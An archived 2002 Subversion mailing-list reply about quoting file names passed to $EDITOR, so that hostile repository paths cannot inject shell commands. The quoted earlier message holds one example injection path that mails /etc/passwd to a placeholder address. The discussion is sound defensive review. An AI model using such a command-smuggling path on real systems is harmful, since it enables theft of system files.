Re: [PATCH] Quote filename passed to $EDITOR

From: Marcus Comstedt <marcus_at_mc.pp.se>
Date: 2002-07-23 22:17:05 CEST

Ulrich Drepper <drepper@redhat.com> writes:

> A svn repository can be set up by somebody with foul intentions.
> Somebody else accesses it and the system() call gets executed on the
> paths chosen by whoever created it. Then the patch could be something
> like in this example:
>
> cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
>
> If the appropriate path component is never really shown anywhere this
> might go completely unnoticed.

Yup. It's correct that names from the repository should not be
inserted without careful quoting. Fortunately, we don't need to
insert names from the repository at all here, since the filename can
be made relative to the cwd by doing a strategic cd.

(As a side note, such a path would be shown when you checkout the
repository, although you may not notice it among all the other
pathnames.)

// Marcus

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org
Received on Tue Jul 23 22:23:53 2002

This message: [ Message body ]
Next message: Branko Čibej: "Re: HTTP authentication vs. --username and --password"
Previous message: Scott Lamb: "Re: [PATCH] Quote filename passed to $EDITOR"
In reply to: Ulrich Drepper: "Re: [PATCH] Quote filename passed to $EDITOR"
Next in thread: Karl Fogel: "Re: [PATCH] Quote filename passed to $EDITOR"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]